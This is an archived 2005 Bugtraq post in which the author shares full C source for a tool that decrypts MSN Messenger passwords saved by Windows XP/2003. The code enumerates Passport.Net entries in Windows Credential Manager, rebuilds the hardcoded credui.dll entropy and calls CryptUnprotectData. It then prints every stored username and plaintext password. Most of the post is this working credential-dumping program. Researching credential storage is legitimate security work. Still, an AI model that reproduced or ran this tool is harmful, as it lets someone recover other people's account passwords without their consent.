lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050817182747.44886.qmail@web8509.mail.in.yahoo.com>
Date: Wed, 17 Aug 2005 19:27:47 +0100 (BST)
From: ViPeR <viper31337@...oo.co.in>
To: bugtraq@...urityfocus.com
Subject: MSN Messenger Password Decrypter for WinXP/2003


MSN Messenger uses Windows Credential UI [credui.dll]
on WinXP/2003. Password-Storage mechanism differs in
these OSes so, the code posted by tombkeeper
[http://xfocus.net/articles/200408/726.html] doesn't
seem to work anymore on my OS atleast. Also, a
'entropy' value has been thrown, which is based on
credui.dll GUID.

So, here is the code that fullfils the same purpose -
but surely works on my OS [WinXP SP2] :)

/--- Start-Code --/

/*
 *  MSN Messenger Password Decrypter for Windows XP &
2003
 *  (Compiled-VC++ 7.0, tested on WinXP SP2, MSN
Messenger 7.0)
 *      - Gregory R. Panakkal
 *        http://www.crapware.tk/
 *        http://www.infogreg.com/
 */

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#pragma comment(lib, "Crypt32.lib")


//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK /
LCC-Win32 Includes]

typedef struct _CREDENTIAL_ATTRIBUTEA {
    LPSTR Keyword;
    DWORD Flags;
    DWORD ValueSize;
    LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
    DWORD Flags;
    DWORD Type;
    LPSTR TargetName;
    LPSTR Comment;
    FILETIME LastWritten;
    DWORD CredentialBlobSize;
    LPBYTE CredentialBlob;
    DWORD Persist;
    DWORD AttributeCount;
    PCREDENTIAL_ATTRIBUTEA Attributes;
    LPSTR TargetAlias;
    LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;

////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR,
DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD,
DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;

////////////////////////////////////////////////////////////////////

void showBanner()
{
    printf("MSN Messenger Password Decrypter for
Windows XP/2003\n");
    printf("   - Gregory R. Panakkal,
http://www.infogreg.com \n\n");
}

////////////////////////////////////////////////////////////////////
int main()
{
    PCREDENTIAL *CredentialCollection = NULL;
    DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

    //used for filling up blobEntropy
    char szEntropyStringSeed[37] =
"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
    short int EntropyData[37];
    short int tmp;

    HMODULE hDLL;
    DWORD Count, i;

    showBanner();

    //Locate CredEnumerate, CredRead, CredFree from
advapi32.dll
    if( hDLL = LoadLibrary("advapi32.dll") )
    {
        pfCredEnumerateA =
(typeCredEnumerateA)GetProcAddress(hDLL,
"CredEnumerateA");
        pfCredReadA =
(typeCredReadA)GetProcAddress(hDLL, "CredReadA");
        pfCredFree =
(typeCredFree)GetProcAddress(hDLL, "CredFree");

        if( pfCredEnumerateA == NULL||
            pfCredReadA == NULL ||
            pfCredFree == NULL )
        {
            printf("error!\n");
            return -1;
        }
    }
    

    //Get an array of 'credential', satisfying the
filter
    pfCredEnumerateA("Passport.Net\\*", 0, &Count,
&CredentialCollection);


    if( Count ) //usually this value is only 1
    {

        //Calculate Entropy Data
        for(i=0; i<37; i++) //
strlen(szEntropyStringSeed) = 37
        {
            tmp = (short int)szEntropyStringSeed[i];
            tmp <<= 2;
            EntropyData[i] = tmp;
        }

        for(i=0; i<Count; i++)
        {
            blobEntropy.pbData = (BYTE *)&EntropyData;
            blobEntropy.cbData = 74;
//sizeof(EntropyData)

            blobCrypt.pbData =
CredentialCollection[i]->CredentialBlob;
            blobCrypt.cbData =
CredentialCollection[i]->CredentialBlobSize;

            CryptUnprotectData(&blobCrypt, NULL,
&blobEntropy, NULL, NULL, 1, &blobPlainText);
            
            printf("Username : %s\n",
CredentialCollection[i]->UserName);
            printf("Password : %ls\n\n",
blobPlainText.pbData);
        }
    }

    pfCredFree(CredentialCollection);
}

/--- End-Code --/

URL :
http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html

rgds,
Gregory R. Panakkal



	

	
		
____________________________________________________
Send a rakhi to your brother, buy gifts and win attractive prizes. Log on to http://in.promos.yahoo.com/rakhi/index.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ